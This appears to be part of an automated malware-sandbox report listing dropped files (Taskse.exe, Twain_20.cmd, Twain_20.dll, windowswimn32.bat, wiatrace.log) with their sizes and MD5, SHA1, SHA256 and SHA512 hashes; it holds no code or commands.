3e2edb0798d7960b0fd8af0ad467b5e2a9973c743be53143e0b72a1c95315ec15530e9d1df70c69853c63d4b09dee8dcc272fae1f67bdb4e3ff218c5c5ef317c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
Filesize
4KB

MD5
56b78ea472bc510def44208dbc0a850a

SHA1
5e309b5edfaa9c6e425e5cab881cb727fe0cac71

SHA256
51a49a9c613f76c3fe5342e33f63ab280aa436da895e5ae8cc55207f09d03bd5

SHA512
2140f2d1c81276c22d7e066d1f0bc217b95719fb7c3624f9cd7513a40e16ce485ba952a2de54fb8c0424df341ebd55ab70098ccec633697a6468640d433014d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
Filesize
9KB

MD5
5cf00f4471f1a310d4d4f04dbcbf3d07

SHA1
726cb4ccdbe3a63dc207a21e8e8f46c8e7c00ab7

SHA256
155c9b8743f88a057f6fa225705b1b0aa702fe0d3895ec0ac335a0603b246a48

SHA512
3ef0461822344aadc63ca9fcf21a6fb0bfb3800777526e4cae60a6a845d3d64ffe44109e2af8d8f928e7912fcb5ee40c66eac71c8c17c300bfd8f45adec94d28

Download Submit
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
Filesize
462B

MD5
4dc05ac0050c0d2f98299a019fda2577

SHA1
9e606ec3d928474adfda99e10a3ef39e5c727683

SHA256
55fbdc6e73e70bf1466c6f00fe182c51aca8ead2fd1e3ee408cf9eff91f1a5da

SHA512
ebe2a623abbb7da77102687d1cbdd6255317ef32de0c0e6920c933c25a8a6069cd6be9f44248d91bdca87270db50468bf5e16ea629dd7277d9e15f34075cb268

Download Submit
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
Filesize
231B

MD5
da5f8d71afd8ce9598ec5e5443c459d9

SHA1
abd2267aaea39b0a9208bc7f094df5fb2754d233

SHA256
a1d679d97c8ab326b9578d18de310789709482bf270d350786e1b30895c92c80

SHA512
1318f1471a536244523141d14c8c73b8dc52de3843eb8b8b3e9b2ae0348eb4f41c085931b8053c5fc68182f0a493d15de7bb086cc872f48203e8f9916886452b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
Filesize
158B

MD5
ad0010095a82da61b486dbe70cd90767

SHA1
67d5a65f8cee8409dfcec2da99d290a2730cd662

SHA256
28d651bd0e01d8ee66b46b064b05841cf33e44f3c55ee8b0612f5a812bf0de43

SHA512
93a5f5c2f71a00ce760f1efe89280e259b3f75f1d04e3a1708d683c0b9a619fb5ac577e0d9f59c3b767c3b45323e3af9450362624526705766bf77a94b4aa827

Download Submit
C:\Users\Admin\AppData\Local\Temp\Twain_20.dll
Filesize
17KB

MD5
591700c81fbd38cf8c83092030536c14

SHA1
a122ca4b91ec2275400e10f21093c43186391c97

SHA256
29415d32850d821d9854bfd6edabee920052e0920e6eceec187ea57b8a3c707e

SHA512
ae3e1ffef5a82016f13fe728a8a3f2696ed55cdd9ea60d6e75352d55f95fe71cb09bad02945601d4661818473882cc4fae4493d9125e3803054e69c861a97758

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize
22B

MD5
fe669e0a3a56961fba38ef9b7f7d01dd

SHA1
338b6f4a3ec71587d53aec450ca5448928f966a1

SHA256
138b48a413afa60daa506090fa4332d913a1f9d895b6c289c36dd7db00019d64

SHA512
ff0bc50cef59421253578172602a56f9f9b3a8988a16576eaf8a004792d330c708dbed95f5f4074fb2eec36d7df7f4a0392c88420d2b0678cd907056a23cd41b

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize
11B

MD5
9905e5a33c6edd8eb5f59780afbf74de

SHA1
64b2cd0186ff6fe05072ee88e2bb54476023772e

SHA256
c134b2f85415ba5cfce3e3fe4745688335745a9bb22152ac8f5c77f190d8aee3

SHA512
e10711d0fb09db27192e9af05ae45b83cf3882d98e904a7f1f969cf24c2f9626f70f35d76f57477fe9c64a58bc74100410740e9d506d4e72d3e2900d6277816e

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize
44B

MD5
2eca550e3ff368fd2a77c81baab3bacb

SHA1
7b5b463c4c218fd4e31a8f1578cc0f99b480f370

SHA256
e67a79239de737d0dcc12146900f9236d1fa7fc27cab0aad842546f8d6357634

SHA512
5e23aea3c790c28e6d66220d49ffb10f2fc309976a69e286c12e77fc702e530072be04f749794f86afe59fce87a340ed3dede4a9b4387c3ae7bdb89adb3af8c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize
71B

MD5
48908618d97f0f42cb01c546fb2a1165

SHA1
e42d967bbe1b99954c69ae526f42487e6346c8c1

SHA256
bb9a1fe1f41db098f24f6d27f8f520797d8939a3f232d805a6d5771bbad65ba5

SHA512
6cec5437a8f5dc05c494cec646d5b20d61b60058ee5889b51015f87b0320d47542505458c98acefd8f067290ff2a95242f84e5447ffe1bc0265a9137416c1ab9

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize
76B

MD5
a67ed226f7153796fbea3904655c5654

SHA1
136f39b1ad05ea062bccefe768bcba2784aa6849

SHA256
fafa35ef0efe7c7bddc9af19f999e107e3a09d8aa4080370478e945b13ce2eab

SHA512
5f8ce28337401c2662e620ff0ad090f629f5756e16d58d20586c7785c1507c4aeb17e089c7e361cc17ba7f188c029b0ff74d8c0dddbb92a6c8583202e0a59805

Download Submit
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
Filesize
49B

MD5
cfb046d3c9513b92c1b287da26f97c28

SHA1
ea8208c4dad826b7fdb3b5b728863a95e86d4383

SHA256
a06f170d4f92bf290e38b0ce1c05bb59c95de2797b1a5253b949ad7e1be9818b

SHA512
dbeeea4d284f59e1455a5426334caa02458e88833aeece9817c51be616697ca4c399b2a9d0e8e44bf4a5ee63d0b37c0aed68c01f1748fa5a23ed6d2af62b3340

Download Submit
C:\Windows\Debug\WIA\wiatrace.log
Filesize
3KB

MD5
91d79814258ccab19bb98f0833b9c978

SHA1
df4a7855888bac4faa0902e75bc9dc462956a2e5

SHA256
0c9c9fa9b901db72022608b4522a57c0611957b7bfcb2713bca13908af899089

SHA512
310e20c3721a9680a9f7a6c99fffd07d2a2620098f0b0b020919908003cd510888e946cdb0ed0118ac85f4536e5af648395414c0ff497bd22253e4b3388f4df6

Download Submit
C:\Windows\Debug\WIA\wiatrace.log
Filesize
4KB

MD5
939abe8b6a543369e8bda49e9f2ebbaa

SHA1
205ac45be0b4c173452df2fe86fd0e3bc0b7f92a

SHA256
13d69238fab5205716be4e0d7f71411f5e149a0e344c31fe35b3e53759a7acaf

SHA512
48d7c188e1de2cdea937e8ea3dae923038c8d4f6055a5a9c4f312acc27fc25e6cddfe47088094cab32800e61d1cbc0c075d86437d0a090978734391d16e77b67

Download Submit
C:\Windows\Debug\WIA\wiatrace.log
Filesize
6KB

MD5
5f354406c69fa0dd6620d501e0131166

SHA1
ca973970c269e8b6ac2de2c03feac16b53901dc8

SHA256
97354b2cc1f895e68a26852d8603cdb1425a093e7976f0f47bbfad847b114954

SHA512
83e2e08d076d3227f59604f3b68f18d1e6d2190d9b96169240ee60cb2f5b4d2701e12fed4f10dc50e33d15ac804b99f2a77c00fa1dc0336a4ec41ad486492b4e

Download Submit
C:\Windows\Debug\WIA\wiatrace.log
Filesize
7KB

MD5
9a20e1e8ea976ec8de20ee3b6f8e3e04

SHA1
64486cdcda6b790d3a28b49ab046969be39d8b6f

SHA256
2cd4359624e826318cbd864304babb2547e7af1c951b52cefd17f3a7c844a2af

SHA512
298fba2e4e390763e3a2ef3e47838edcc6aea1f5d2f87b076692763bfc6f717d2113d75adc983bc14103d38a8a85af78b4a6ac1d049ddb6047c60ed3e0dc33bf

Download Submit
C:\Windows\Debug\WIA\wiatrace.log
Filesize
9KB

MD5
c27333f7c9700d7d88745d60f1462113

SHA1
d82758321ce97b7d6bc79997e14af00548bb7bae

SHA256
5b0c3818de4ace2dd0d4f108314b847195ca81b2fbc01b4a26fcf7921231bc3b

SHA512
4af2f7f10cc6b189d5e438990db020f8c6d526941cff2d098a67588b4d3451806b3bbd649eb2c1222464381e788518e542c5997d0a211c647ff4207709e8aef3

Download Submit
C:\Windows\Debug\WIA\wiatrace.log
Filesize
1KB

MD5
aee79d3bdd656246c07828a955a3eaf9

SHA1
26d5edc66ea9b7d04a8082e3085f29b73cc253d3

SHA256
4b50028dedf3d6e0581b435ae9f1e37d25aa603b1b7e49bedaaa3823b53548c3

SHA512
71cdaa1718cd250f6e2381b67a560b316278d34b72a85008f86818bcae157a6f8412ac35a088e8bccbe013e15accaa69e83e06094b618b6c0fdeed4b13117324

Download Submit